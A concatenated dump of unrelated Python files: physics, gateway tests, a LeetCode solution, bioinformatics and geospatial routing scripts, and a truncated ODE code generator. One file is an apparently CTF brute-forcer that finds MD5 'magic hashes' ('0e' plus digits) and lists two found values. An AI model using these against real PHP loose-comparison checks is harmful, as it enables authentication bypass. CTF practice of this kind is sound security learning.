radiation , Hz\nE = (h*f); # Energy carried by one photon from Planck's law, J\nK_max = (e*V_0); # Maximum kinetic energy of electrons, J\n # We have, WorkFunction W = E-K_max\nW_in_joule = ((h*f)-(e*V_0));\n #Converting 
to eV, Dividing by e=1.6e-19 to get WorkFunction\nW_in_eV = (W_in_joule/e)\n\n\n#Result\n\n\nprint(\"The work function of Pt metal (in joule) = \")\nprint (W_in_joule , \"joule\")\nprint(\"The work function of Pt metal (in eV) = \")\nprint (W_in_eV,\"eV\")\n\n#Error Calculation\nprint(\"Theoretical Value of WorkFunction of Pt:-\", W_Theo ,\"eV\" )\nprint(\"Calculated Value of WorkFunction of Pt:-\",W_in_eV,\"eV\")\n\n#Error=(|theoreticalValue-CalculatedValue|)/theoreticalValue\nError=(W_Theo-W_in_eV)/(W_Theo)\nprint(\"ErrorCalculated=\",Error)\n\n#Error%=Error*100\nError_Percent = Error*100\nprint(\"ErrorPercentage=\",Error_Percent,\"%\")\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"WorkFunctionPLATINUM.py","file_name":"WorkFunctionPLATINUM.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"332686873","text":"import hashlib\n\nalnum = '1234567890'\n\n\ndef try_crack(prefix):\n for al in alnum:\n candidate = prefix + al\n\n h = hashlib.md5(candidate.encode('utf-8')).hexdigest()\n\n if h.startswith('0e'):\n try:\n int(h[2:])\n print(candidate)\n exit()\n except:\n continue\n\n\npre = '0e'\nnum = 0\n\nwhile True:\n try_crack('%s%d' % (pre, num))\n num += 1\n\n# 0e1137126905\n# 0e215962017","sub_path":"2017_hack_dat_kiwi/md5_1/md5.py","file_name":"md5.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"294331617","text":"import unittest\nimport random\nimport time\n\nfrom messages import StatusMessage, RegisterMessage, Message, MessageHeader, ACKMessage, MessageType\nfrom gateway import Gateway\nfrom devices import Device\nfrom message_handler import DummyMessageHandler\nimport stacktracer\n\n\nclass TestGateway(unittest.TestCase):\n\n def setUp(self):\n self.message_handler = DummyMessageHandler()\n self.gw = Gateway(self.message_handler)\n self.gw.start()\n\n def tearDown(self):\n self.gw.stop()\n self.gw.join()\n\n def test_noNodesAfterStartup(self):\n self.assertEqual(len(self.gw.get_connected_nodes()), 0)\n\n def test_Register(self):\n led = Device(\"name\", self.message_handler)\n self.assertEqual(led.connect(), True)\n time.sleep(0.1)\n connected_nodes = self.gw.get_connected_nodes()\n self.assertEqual(len(connected_nodes), 1)\n node = connected_nodes[led.node_id]\n self.assertEqual(node.name, led.name)\n self.assertEqual(node.registered, True)\n\n last_seen = node.last_seen\n\n led._send_status()\n time.sleep(0.1)\n\n connected_nodes = self.gw.get_connected_nodes()\n self.assertEqual(len(connected_nodes), 1)\n node = connected_nodes[led.node_id]\n self.assertEqual(node.name, led.name)\n self.assertEqual(node.registered, True)\n self.assertNotEqual(node.last_seen, last_seen)\n\n # calling connect again should change nothing\n self.assertEqual(led.connect(), True)\n connected_nodes = self.gw.get_connected_nodes()\n self.assertEqual(len(connected_nodes), 1)\n\n def test_sendUnknownMessage(self):\n header = MessageHeader(node_id = 1, group_id = 1, wants_ack = False)\n m = Message(99, header)\n self.message_handler.write_message_from_device(m)\n self.assertEqual(len(self.gw.get_connected_nodes()), 0)\n # wait so the gateway can finish processing\n time.sleep(0.01)\n\n def test_sendACKForUnknownMessage(self):\n dev = Device(\"name\", self.message_handler)\n self.assertEqual(dev.connect(), True)\n header = MessageHeader(node_id = dev.node_id, group_id = dev.group_id, wants_ack = False)\n m = 
ACKMessage(header)\n self.message_handler.write_message_from_device(m)\n time.sleep(0.1)\n self.assertEqual(len(self.gw.get_connected_nodes()), 1)\n\n def test_sendACKForUnknownNode(self):\n header = MessageHeader(node_id = 1, group_id = 1, wants_ack = False)\n m = ACKMessage(header)\n self.message_handler.write_message_from_device(m)\n self.assertEqual(len(self.gw.get_connected_nodes()), 0)\n # wait so the gateway can finish processing\n time.sleep(0.1)\n\n def test_moreThan30Nodes(self):\n for i in range(0, 30):\n dev = Device('%s' % i, self.message_handler)\n if i == 29:\n # too many nodes registered\n self.assertEqual(dev.connect(), False)\n else:\n self.assertEqual(dev.connect(), True)\n\n time.sleep(0.1)\n connected_nodes = self.gw.get_connected_nodes()\n self.assertEqual(len(connected_nodes), 29)\n\n def test_sendRegisterMessageWithoutACKRequest(self):\n header = MessageHeader(node_id = 1, group_id = 1, wants_ack = False)\n m = RegisterMessage(header)\n self.message_handler.write_message_from_device(m)\n time.sleep(0.1)\n self.assertEqual(len(self.gw.get_connected_nodes()), 1)\n\n def test_sendRegisterMessageWithWrongNodeId(self):\n header = MessageHeader(node_id = 5, group_id = 1, wants_ack = False)\n m = RegisterMessage(header)\n self.message_handler.write_message_from_device(m)\n time.sleep(0.1)\n self.assertEqual(len(self.gw.get_connected_nodes()), 0)\n\n def test_sendStatusForUnknownNode(self):\n header = MessageHeader(node_id = 5, group_id = 1, wants_ack = False)\n m = StatusMessage(header, name = 'dev name')\n self.message_handler.write_message_from_device(m)\n self.assertEqual(len(self.gw.get_connected_nodes()), 0)\n # wait so the gateway can finish processing\n time.sleep(0.1)\n\n def test_Register_lostRegisterResponse(self):\n token = random.random()\n\n dev = Device('test dev', self.message_handler)\n\n header = MessageHeader(node_id = 1, group_id = 1, wants_ack = False)\n p = RegisterMessage(header, name = dev.name, token = token)\n self.message_handler.write_message_from_device(p)\n\n # ignore RegisterResponseMessage for now\n m = dev._incoming_messages.get(True, 1)\n\n # the gateway should already list the node as not registered\n connected_nodes = self.gw.get_connected_nodes()\n self.assertEqual(len(connected_nodes), 1)\n self.assertEqual(connected_nodes[m.new_node_id].name, dev.name)\n self.assertEqual(connected_nodes[m.new_node_id].registered, False)\n\n # write a register message again, let's assume the RegisterResponse\n # Message was lost\n self.message_handler.write_message_from_device(p)\n\n m2 = dev._incoming_messages.get(True, 1)\n self.assertEqual(m.token, m2.token)\n self.assertEqual(m.new_node_id, m2.new_node_id)\n\n # the gateway should still list the node as not registered\n connected_nodes = self.gw.get_connected_nodes()\n self.assertEqual(len(connected_nodes), 1)\n self.assertEqual(connected_nodes[m.new_node_id].name, dev.name)\n self.assertEqual(connected_nodes[m.new_node_id].registered, False)\n\n\nif __name__ == '__main__':\n stacktracer.trace_start(\"trace.html\")\n unittest.main()\n","sub_path":"gateway/test_gateway.py","file_name":"test_gateway.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"159787976","text":"def input_score():\n grade_dict = {40: 'E', 50: 'D', 60: 'C-', 65: 'C+',\n 70: 'B-', 75: 'B+', 80: 'A', 90: 'S',\n 100: 'SSS'}\n while True:\n score_str = raw_input(\"input your score: \")\n try:\n score_num = int(score_str)\n if score_num 
< 0 or score_num > 100:\n                raise ValueError\n            # valid input received; leave the retry loop\n            break\n        except ValueError:\n            print(\"invalid input\")\n\n    res = 'F'\n    for score in sorted(grade_dict.keys()):\n        if score_num >= score:\n            res = grade_dict[score]\n        else:\n            break\n    return res\n\n\nif __name__ == '__main__':\n    print(\"Your grade is %s\" % input_score())\n","sub_path":"code/lesson1.py","file_name":"lesson1.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"173767575","text":"## 590. N-ary Tree Postorder Traversal\n\n# Example 1:\n# Input: root = [1,null,3,2,4,null,5,6]\n# Output: [5,6,3,2,4,1]\n\n# Example 2:\n# Input: root = [1,null,2,3,4,5,null,null,6,7,null,8,null,9,10,null,null,11,null,12,null,13,null,null,14]\n# Output: [2,6,14,11,7,3,12,8,4,13,9,10,5,1]\n\n\"\"\"\n# Definition for a Node.\nclass Node:\n    def __init__(self, val=None, children=None):\n        self.val = val\n        self.children = children\n\"\"\"\n\nfrom typing import List  # needed for the List[int] annotation below\n\nclass Solution:\n    def postorder(self, root: 'Node') -> List[int]:\n\n        self.result = []\n\n        def helper(node):\n            # post-order: recurse into every child, then record the node\n            if not node:\n                return\n\n            for child in node.children:\n                helper(child)\n\n            self.result.append(node.val)\n\n        helper(root)\n\n        return self.result","sub_path":"Leetcode/N-ary Trees/p590.py","file_name":"p590.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"233692186","text":"#!/links/application/dsu/Python-3.2/python\n\n'''\nDocu\n'''\n\nimport subprocess\nimport shlex\nimport os\nimport fnmatch\nimport concurrent.futures\n\nrscriptPath = '/links/application/dsu/R-scripts'\npwd = os.getcwd()\npattern = '*.fastq.gz'\nrscript = '/links/application/dsu/R-2.13.2/bin/Rscript'\nconcatenationScript='/links/application/dsu/bin/concatenate_pdfs.py'\nmaxConcurrentJobs=5\n\ndef run_me(fastqFile):\n    (path, file) = os.path.split(fastqFile)\n    os.chdir(path)\n    args = rscript + ' --vanilla ' + rscriptPath + '/' + 'fastq_quality.R ' + file\n    #print(args)\n    SplitArgs = shlex.split(args)\n    p = subprocess.Popen(SplitArgs)\n    p.wait()\n    #subprocess.Popen(concatenationScript)\n\ndef findFiles (pattern):\n    matches = []\n    for root, dirnames, filenames in os.walk(pwd):\n        for filename in fnmatch.filter(filenames, pattern):\n            matches.append(os.path.join(root, filename))\n    return matches\n\ndef callR():\n    matchingFiles = findFiles(pattern)\n    with concurrent.futures.ThreadPoolExecutor(max_workers=maxConcurrentJobs) as executor:\n        out = [executor.submit(run_me, lane)\n               for lane in matchingFiles]\ncallR()\n","sub_path":"deep_sequencing_unit/source/Python/fastq_quality.py","file_name":"fastq_quality.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"423739771","text":"#!/usr/bin/env python3\n\nfrom geopy.distance import vincenty\nfrom shapely.wkt import loads as wktToLineString\nfrom shapely.geometry import LineString, Point\nfrom scipy import interpolate\nfrom scipy.interpolate import Rbf\nimport geopandas as gp\nimport pandas as pd\nimport numpy as np\nimport progressbar\nimport osrm\nimport sys\nimport urllib\nimport gdal, ogr, os, osr\n\nfrom settings import dirs, ech0\n\n##\n### Analysis Settings\n##\n\ndatasets = {\n    \"villages\": \"villages.shp\",\n    \"towns\": \"towns.shp\",\n    \"residential\": \"residential_points.shp\",\n    \"schools\": \"school_points.shp\",\n    \"hospitals\": \"hospitals.shp\",\n    \"rivers\": \"rivers.shp\",\n}\n\n### Nearest service 
configuration\nosrm.RequestConfig.profile = \"foot\"\n\nsource = \"villages\"\ndests = [\"schools\", \"hospitals\", \"towns\"]\n\n### Remoteness calculation configuration\ndests_w = {\"schools\": 0.5, ## destination datasets with their weights to calculate remoteness\n \"hospitals\": 0.5,\n \"towns\": 0.5}\n\n### Sample \"channels\" / perpendicular line settings\nsmp_corridor = \"rivers\" ## sample linestrings\nminDist_m = [200, 200, 200, 200, 200]\nperpLen_m = [50, 75, 100, 125, 150]\n\n### Remoteness interpolation settings\n#rinterp_grd = min(minPerp_m)/4 ## size of blocks to sample at\n\ndef main():\n\n ##\n ### Do the damn thang!\n ##\n \n global d\n\n ## Load data\n d = load_data(datasets)\n\n ## Calculate nearest service and route to nearest service, for each service\n for dest in dests:\n route = \"{}_{}_routes\".format(source, dest)\n \n d[source] = calc_nearest(d, source, dest)\n d[route] = calc_route(d, source, dest) ## Add all the routes to each [source]_[dest]_routes dataset\n\n ## Calculate the remoteness statistic \n d[source] = calc_remoteness(d, source, dests_w)\n \n ## Generate perpendicular lines for all the specified parameters of them\n for i in range(len(minDist_m)):\n perp = \"perp_{}_{}\".format(minDist_m[i], perpLen_m[i])\n d[perp] = calc_perp_lines(d, smp_corridor, minDist_m[i], perpLen_m[i])\n\n ## Hand it off to R? \n #d = calc_rinterp(d, source, grd_size_m) ## spline interpolation w/ scipy\n\n save_shp(d)\n\ndef load_data(datasets):\n \n ##\n ## Load data\n ##\n\n ech0(\"Loading data\")\n\n d = {} ## data\n\n for name, filename in datasets.items():\n print(\"Loading: {}\".format(name))\n d[name] = gp.GeoDataFrame.from_file(\"{}{}\".format(dirs[\"results\"],filename))\n\n return d\n\ndef calc_nearest(d, source, dest):\n \n ##\n ## Compute distance matrix of villages to each near school, hospital ...\n ##\n\n d_tag = dest[:3]\n \n ech0(\"Calculating nearest {} ({})...\".format(dest, d_tag))\n\n ## columns to add to the source dataset\n new_cols = {\n \"{}_near\".format(d_tag): 0, ## %%-near = ID of nearest essential service %%\n \"{}_dur\".format(d_tag): 0, ## %%-dur = duration of travel from village to %%\n \"{}_ndst\".format(d_tag): 0, ## %%-ndst = norm distance between village and %%\n \"{}_wdst\".format(d_tag): 0, ## %%-wdst = walking distance between village and %%\n \"snap_dist\": 0\n }\n\n for new_col, new_val in new_cols.items():\n if new_col not in d[source].columns:\n d[source] = d[source].assign(**{new_col: new_val})\n \n ## Get ids and coords for each destination\n d_ids = d[dest].index.tolist()\n d_coords = d[dest].geometry.apply(lambda c: (c.centroid.x, c.centroid.y)).tolist()\n\n max_idx = len(d[source])-1\n bar = progressbar.ProgressBar(max_value=max_idx)\n \n ## Loop thru source origins \n for origin in d[source].itertuples():\n \n (o_idx, o_geo) = (origin[0], origin[3]) # origin index, geometry\n o_coords = (o_geo.x, o_geo.y) # tuple of lon, lat\n\n bar.update(o_idx)\n\n ##\n ## Use OSRM to find distance between origin and all dests\n ##\n \n try:\n (d_dur, o_snap, d_snap) = osrm.table([o_coords],\n ids_origin = [o_idx],\n coords_dest = d_coords,\n ids_dest = d_ids,\n output=\"pandas\")\n\n except urllib.error.URLError as e:\n print(\"URLError. 
Perhaps osrm-backend is not started?\\n\" +\n \" Error: {}\".format(e.reason))\n sys.exit()\n\n ##\n ## Find the nearest destination and record stats\n ##\n \n d_dur = d_dur.transpose() ## duration from origin to all dests\n d_nearest = d_dur.idxmin()[o_idx] ## id of nearest dest\n d_nearest_dur = d_dur.min()[o_idx] ## duration from origin to nearest dest\n\n if not d_nearest == d_nearest: ## check for nan return values\n d_nearest = d_nearest_dur = d_ndst = -1\n else:\n d_ndst = round(vincenty(d_coords[d_nearest], o_coords).m)\n\n # origin snap distance\n o_sdst = round(vincenty(o_coords, tuple(o_snap[0])).m)\n\n ##\n ## Update the source dataset with the new stats\n ##\n \n ## Add the nearest destination info to source datasets\n d[source].set_value(o_idx, \"{}_near\".format(d_tag), d_nearest)\n d[source].set_value(o_idx, \"{}_dur\".format(d_tag), d_nearest_dur)\n d[source].set_value(o_idx, \"{}_ndst\".format(d_tag), d_ndst)\n d[source].set_value(o_idx, \"snap_dist\", o_sdst)\n\n bar.update(max_idx)\n \n return d[source]\n\ndef calc_route(d, source, dest):\n \n ##\n ### Compute route between each village and each nearest service\n ##\n\n global d_idx, o_idx, d_tag\n \n d_tag = dest[:3]\n\n ech0(\"Calculating routes to nearest {} ({})\".format(dest, d_tag))\n \n ## columns to add to each routes dataset\n route_cols = {\n \"org_id\": 0,\n \"dst_id\": 0,\n \"dist\": 0 \n }\n\n route_df = gp.GeoDataFrame().assign(**route_cols)\n routes = []\n\n max_idx = len(d[source])-1\n r_bar = progressbar.ProgressBar(max_value=max_idx)\n \n for origin in d[source].itertuples():\n \n (o_idx, o_geo) = (origin[0], origin[3])\n o_coords = (o_geo.x, o_geo.y)\n\n r_bar.update(o_idx)\n \n d_idx = getattr(d[source].iloc[o_idx], \"{}_near\".format(d_tag))\n d_row = d[dest].iloc[[d_idx]]\n \n d_coords = d_row.geometry.apply(lambda c: (c.centroid.x, c.centroid.y)).tolist()[0]\n #d_coords = (d_row.geometry.centroid.x, d_row.geometry.centroid.y)\n \n try:\n r_resp = osrm.simple_route(o_coords,\n d_coords,\n geometry=\"wkt\",\n overview=\"full\")\n except urllib.error.HTTPError as e:\n continue\n \n r_dist = r_resp[\"routes\"][0][\"distance\"]\n r_wkt = r_resp[\"routes\"][0][\"geometry\"]\n r_geom = wktToLineString(r_wkt)\n \n ## Set walking distance to each destination on source dataset\n d[source].set_value(o_idx, \"{}_wdst\".format(d_tag), r_dist)\n\n ## Create a linestring route between source and dest\n route = {\n \"org_id\": o_idx,\n \"dst_id\": d_idx,\n \"dist\": r_dist,\n \"geometry\": r_geom\n }\n \n routes.append(route)\n\n r_bar.update(max_idx)\n\n return route_df.append(routes)\n\ndef calc_perp_lines(d, smp_corridor, minDist_m, perpLen_m):\n\n ech0(\"Calculating perpendicular lines (minDist: {}m, perpLen: {}m)\".format(minDist_m, perpLen_m))\n \n corridor = d[smp_corridor]\n wgs84_m2deg = 1/( vincenty((0,0), (0,1)).m )\n \n minDist_d = wgs84_m2deg * minDist_m\n perpLen_d = wgs84_m2deg * perpLen_m\n\n perp_df = gp.GeoDataFrame().assign(name=\"\", osm_id=0, idx=0)\n perp_lines = []\n \n ## loop thru linestrings\n for feature in corridor.itertuples():\n\n (f_idx, f_geo) = (feature[0], feature[3])\n (f_x, f_y) = f_geo.coords.xy\n\n ncoords = len(f_x)\n node_idx = 0\n cum_length = 0\n\n if (ncoords <= 3):\n continue\n\n for i in range(ncoords-2):\n y0 = (f_x[i], f_y[i])\n y1 = (f_x[i+1], f_y[i+1])\n y2 = (f_x[i+2], f_y[i+2])\n\n cum_length = cum_length + Point(y0).distance(Point(y1))\n \n if cum_length >= minDist_d:\n\n ## Perpendicular point\n xp = (y2[0] - y0[0])\n yp = (y2[1] - y0[1])\n\n ## Avoid a Divide 
by Zero\n if xp == 0:\n xp = np.finfo(float).eps\n \n theta = np.arctan( yp/xp )\n\n dx = perpLen_d * np.cos(theta + np.pi/2)\n dy = perpLen_d * np.sin(theta + np.pi/2)\n\n ## Generate line from \n pt0 = ( (y1[0]-dx), (y1[1]-dy) )\n pt1 = ( y1[0], y1[1] )\n pt2 = ( (y1[0]+dx), (y1[1]+dy) )\n\n perp = {\n \"name\": feature[4],\n \"osm_id\": feature[5],\n \"idx\": node_idx,\n \"geometry\": LineString([pt0, pt1, pt2])\n }\n\n perp_lines.append(perp)\n\n node_idx = node_idx + 1\n cum_length = 0\n\n perp_df = perp_df.append(perp_lines)\n return perp_df\n\ndef calc_remoteness(d, source, dests_w):\n\n ##\n ### Calculates a \"remoteness\" statistic based upon distance to serviced & supplied rates\n ##\n\n ech0(\"Calculating \\\"remoteness\\\"\")\n\n ## Min-max normalization\n def norm(col):\n return (col - col.min()) / (col.max() - col.min())\n\n ##\n d[source] = d[source].assign(remote=0)\n \n for dest in list(dests_w):\n dist_col = d[source][\"{}_wdst\".format(dest[:3])] ## have _wdst be the parameter\n dist_norm = norm(dist_col)\n\n d[source][\"remote\"] = d[source][\"remote\"] + (dist_norm * dests_w[dest])\n\n d[source][\"remote\"] = norm(d[source][\"remote\"])\n \n return d[source]\n\n\ndef save_shp(d):\n\n ## \n ## Save output datasets \n ##\n\n ech0(\"Saving output shp\")\n\n for d_name, d_data in d.items():\n if d_name == source:\n filename = \"{}_remoteness.shp\".format(source)\n else:\n filename = \"{}.shp\".format(d_name)\n\n path = \"{}{}\".format(dirs[\"results\"], filename)\n print(\"Writing: {}\".format(path))\n d_data.to_file(path)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":10672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"37791054","text":"#!/usr/bin/env python\n\nimport warnings\n\nimport numpy as np\nimport numpy.linalg\nimport scipy.linalg\nimport sympy as sm\nimport sympy.physics.mechanics as me\nfrom sympy.core.function import UndefinedFunction\nCython = sm.external.import_module('Cython')\ntheano = sm.external.import_module('theano')\nif theano:\n from sympy.printing.theanocode import theano_function\n\nfrom .cython_code import CythonMatrixGenerator\n\n\nclass ODEFunctionGenerator(object):\n \"\"\"This is an abstract base class for all of the generators. A subclass\n is expected to implement the methods necessary to evaluate the arrays\n needed to compute xdot for the three different system specification\n types.\"\"\"\n\n _rhs_doc_template = \\\n\"\"\"\\\nReturns the derivatives of the states, i.e. 
numerically evaluates the right\nhand side of the first order differential equation.\n\nx' = f(x, t,{specified_call_sig} p)\n\nParameters\n==========\nx : ndarray, shape({num_states},)\n The state vector is ordered as such:\n{state_list}\nt : float\n The current time.{specifieds_explanation}{constants_explanation}\n\nReturns\n=======\ndx : ndarray, shape({num_states},)\n The derivative of the state vector.\n\n\"\"\"\n\n _constants_doc_templates = {}\n\n _constants_doc_templates[None] = \\\n\"\"\"\np : dictionary len({num_constants}) or ndarray shape({num_constants},)\n Either a dictionary that maps the constants symbols to their numerical\n values or an array with the constants in the following order:\n{constant_list}\\\n\"\"\"\n\n _constants_doc_templates['array'] = \\\n\"\"\"\np : ndarray shape({num_constants},)\n A ndarray of floats that give the numerical values of the constants in\n this order:\n {constant_list}\\\n\"\"\"\n\n _constants_doc_templates['dictionary'] = \\\n\"\"\"\np : dictionary len({num_constants})\n A dictionary that maps the constants symbols to their numerical values\n with at least these keys:\n{constant_list}\\\n\"\"\"\n\n _specifieds_doc_templates = {}\n\n _specifieds_doc_templates[None] = \\\n\"\"\"\nr : dictionary; ndarray, shape({num_specified},); function\n\n There are three options for this argument. (1) is more flexible but\n (2) and (3) are much more efficient.\n\n (1) A dictionary that maps the specified functions of time to floats,\n ndarrays, or functions that produce ndarrays. The keys can be a single\n specified symbolic function of time or a tuple of symbols. The total\n number of symbols must be equal to {num_specified}. If the value is a\n function it must be of the form g(x, t), where x is the current state\n vector ndarray and t is the current time float and it must return an\n ndarray of the correct shape. For example::\n\n r = {{a: 1.0,\n (d, b) : np.array([1.0, 2.0]),\n (e, f) : lambda x, t: np.array(x[0], x[1]),\n c: lambda x, t: np.array(x[2])}}\n\n (2) A ndarray with the specified values in the correct order and of the\n correct shape.\n\n (3) A function that must be of the form g(x, t), where x is the current\n state vector and t is the current time and it must return an ndarray of\n the correct shape.\n\n The specified inputs are, in order:\n{specified_list}\\\n\"\"\"\n\n _specifieds_doc_templates['array'] = \\\n\"\"\"\nr : ndarray, shape({num_specified},)\n\n A ndarray with the specified values in the correct order and of the\n correct shape.\n\n The specified inputs are, in order:\n{specified_list}\\\n\"\"\"\n\n _specifieds_doc_templates['function'] = \\\n\"\"\"\nr : function\n\n A function that must be of the form g(x, t), where x is the current\n state vector and t is the current time and it must return an ndarray of\n shape({num_specified},).\n\n The specified inputs are, in order:\n{specified_list}\\\n\"\"\"\n\n _specifieds_doc_templates['dictionary'] = \\\n\"\"\"\nr : dictionary\n A dictionary that maps the specified functions of time to floats,\n ndarrays, or functions that produce ndarrays. The keys can be a single\n specified symbolic function of time or a tuple of symbols. The total\n number of symbols must be equal to {num_specified}. If the value is a\n function it must be of the form g(x, t), where x is the current state\n vector ndarray and t is the current time float and it must return an\n ndarray of the correct shape. 
For example::\n\n r = {{a: 1.0,\n (d, b) : np.array([1.0, 2.0]),\n (e, f) : lambda x, t: np.array(x[0], x[1]),\n c: lambda x, t: np.array(x[2])}}\n\n The specified inputs are, in order:\n{specified_list}\\\n\"\"\"\n\n @staticmethod\n def _deduce_system_type(**kwargs):\n \"\"\"Based on the combination of arguments this returns which ODE\n description has been provided.\n\n full rhs\n x' = f(x, t, r, p)\n full mass matrix\n M(x, p) * x' = f(x, t, r, p)\n min mass matrix\n M(q, p) * u' = f(q, u, t, r, p)\n q' = g(q, u, t)\n\n \"\"\"\n\n if kwargs.pop('coordinate_derivatives') is not None:\n system_type = 'min mass matrix'\n elif kwargs.pop('mass_matrix') is not None:\n system_type = 'full mass matrix'\n else:\n system_type = 'full rhs'\n\n return system_type\n\n def __init__(self, right_hand_side, coordinates, speeds, constants,\n mass_matrix=None, coordinate_derivatives=None,\n specifieds=None, linear_sys_solver='numpy',\n constants_arg_type=None, specifieds_arg_type=None):\n \"\"\"Generates a numerical function which can evaluate the right hand\n side of the first order ordinary differential equations from a\n system described by one of the following three symbolic forms:\n\n [1] x' = F(x, t, r, p)\n\n [2] M(x, p) x' = F(x, t, r, p)\n\n [3] M(q, p) u' = F(q, u, t, r, p)\n q' = G(q, u, t, r, p)\n\n where\n\n x : states, i.e. [q, u]\n t : time\n r : specified (exogenous) inputs\n p : constants\n q : generalized coordinates\n u : generalized speeds\n M : mass matrix (full or minimum)\n F : right hand side (full or minimum)\n G : right hand side of the kinematical differential equations\n\n The generated function is of the form F(x, t, p) or F(x, t, r, p)\n depending on whether the system has specified inputs or not.\n\n Parameters\n ==========\n right_hand_side : SymPy Matrix, shape(n, 1)\n A column vector containing the symbolic expressions for the\n right hand side of the ordinary differential equations. If the\n right hand side has been solved for symbolically then only F is\n required, see form [1]; if not then the mass matrix must also be\n supplied, see forms [2, 3].\n coordinates : sequence of SymPy Functions\n The generalized coordinates. These must be ordered in the same\n order as the rows in M, F, and/or G and be functions of time.\n speeds : sequence of SymPy Functions\n The generalized speeds. These must be ordered in the same order\n as the rows in M, F, and/or G and be functions of time.\n constants : sequence of SymPy Symbols\n All of the constants present in the equations of motion. The\n order does not matter.\n mass_matrix : sympy.Matrix, shape(n, n), optional\n This can be either the \"full\" mass matrix as in [2] or the\n \"minimal\" mass matrix as in [3]. The rows and columns must be\n ordered to match the order of the coordinates and speeds. In the\n case of the full mass matrix, the speeds should always be\n ordered before the speeds, i.e. x = [q, u].\n coordinate_derivatives : sympy.Matrix, shape(m, 1), optional\n If the \"minimal\" mass matrix, form [3], is supplied, then this\n column vector represents the right hand side of the kinematical\n differential equations.\n specifieds : sequence of SymPy Functions\n The specified exogenous inputs to the system. These should be\n functions of time and the order does not matter.\n linear_sys_solver : string or function\n Specify either `numpy` or `scipy` to use the linear solvers\n provided in each package or supply a function that solves a\n linear system Ax=b with the call signature x = solve(A, b). 
For\n            example, if you need to use custom kwargs for the SciPy solver,\n            pass in a lambda function that wraps the solver and sets them.\n        constants_arg_type : string\n            The generated function accepts two different types of arguments\n            for the numerical values of the constants: either a ndarray of\n            the constants values in the correct order or a dictionary\n            mapping the constants symbols to the numerical values. If None,\n            this is determined inside of the generated function and can\n            cause a significant slowdown for performance critical code. If\n            you know a priori what arg types you need to support, choose\n            either ``array`` or ``dictionary``. Note that ``array`` is\n            faster than ``dictionary``.\n        specifieds_arg_type : string\n            The generated function accepts three different types of\n            arguments for the numerical values of the specifieds: either a\n            ndarray of the specifieds values in the correct order, a\n            function that generates the correctly ordered ndarray, or a\n            dictionary mapping the specifieds symbols or tuples thereof\n            to floats, ndarrays, or functions. If None, this is determined\n            inside of the generated function and can cause a significant\n            slowdown for performance critical code. If you know a priori\n            what arg types you want to support, choose either ``array``,\n            ``function``, or ``dictionary``. From fastest to slowest, the\n            options are ``array``, ``function``, ``dictionary``, None.\n\n        Notes\n        =====\n        The generated function still supports the pre-0.3.0 extra argument\n        style, i.e. args = {'constants': ..., 'specified': ...}, but only if\n        ``constants_arg_type`` and ``specifieds_arg_type`` are both set to\n        None. This functionality is deprecated and will be removed in 0.4.0,\n        so it's best to adjust your code to support the new argument types.\n        See the docstring for the generated function for more info on the\n        new style of arguments.\n\n        \"\"\"\n\n        self.right_hand_side = right_hand_side\n        self.coordinates = coordinates\n        self.speeds = speeds\n        self.constants = constants\n        self.mass_matrix = mass_matrix\n        self.coordinate_derivatives = coordinate_derivatives\n        self.specifieds = specifieds\n        self.linear_sys_solver = linear_sys_solver\n        self.constants_arg_type = constants_arg_type\n        self.specifieds_arg_type = specifieds_arg_type\n\n        self.system_type = self._deduce_system_type(\n            mass_matrix=mass_matrix,\n            coordinate_derivatives=coordinate_derivatives)\n\n        self.num_coordinates = len(coordinates)\n        self.num_speeds = len(speeds)\n        self.num_states = self.num_coordinates + self.num_speeds\n        self.num_constants = len(constants)\n\n        if self.specifieds is None:\n            self.num_specifieds = 0\n            self.specifieds_arg_type = None\n        else:\n            self.num_specifieds = len(specifieds)\n\n        # These are pre-allocated storage for the numerical values used in\n        # some of the rhs() evaluations.\n        self._constants_values = np.empty(self.num_constants)\n        self._specifieds_values = np.empty(self.num_specifieds)\n\n        self._check_system_consistency()\n\n    @property\n    def linear_sys_solver(self):\n        return self._linear_sys_solver\n\n    @linear_sys_solver.setter\n    def linear_sys_solver(self, v):\n\n        # store the requested solver so the property getter works\n        self._linear_sys_solver = v\n\n        if isinstance(v, type(lambda x: x)):\n            self._solve_linear_system = v\n        elif v == 'numpy':\n            self._solve_linear_system = numpy.linalg.solve\n        elif v == 'scipy':\n            self._solve_linear_system = scipy.linalg.solve\n        else:\n            msg = '{} is not a valid solver.'\n            raise ValueError(msg.format(v))\n\n    def _check_system_consistency(self):\n\n        if self.system_type == 'min mass matrix':\n\n            nr, nc = self.mass_matrix.shape\n            
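# sanity check: the minimal-form mass matrix must be square, with one row and column per generalized speed\n            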
assert self.num_speeds == nr == nc\n assert self.num_speeds == self.right_hand_side.shape[0]\n assert self.num_coordinates == self.coordinate_derivatives.shape[0]\n\n elif self.system_type == 'full mass matrix':\n\n nr, nc = self.mass_matrix.shape\n assert self.num_states == nr == nc\n assert self.num_states == self.right_hand_side.shape[0]\n assert self.coordinate_derivatives is None\n\n elif self.system_type == 'full rhs':\n\n assert self.num_states == self.right_hand_side.shape[0]\n assert self.mass_matrix is None\n assert self.coordinate_derivatives is None\n\n @staticmethod\n def list_syms(indent, syms):\n \"\"\"Returns a string representation of a valid rst list of the\n symbols in the sequence syms and indents the list given the integer\n number of indentations.\"\"\"\n indentation = ' ' * indent\n lst = '- ' + ('\\n' + indentation + '- ').join([str(s) for s in syms])\n return indentation + lst\n\n def _parse_old_style_extra_args(self, *args):\n \"\"\"Returns the post-0.3.0 style args if the pre-0.3.0 style args 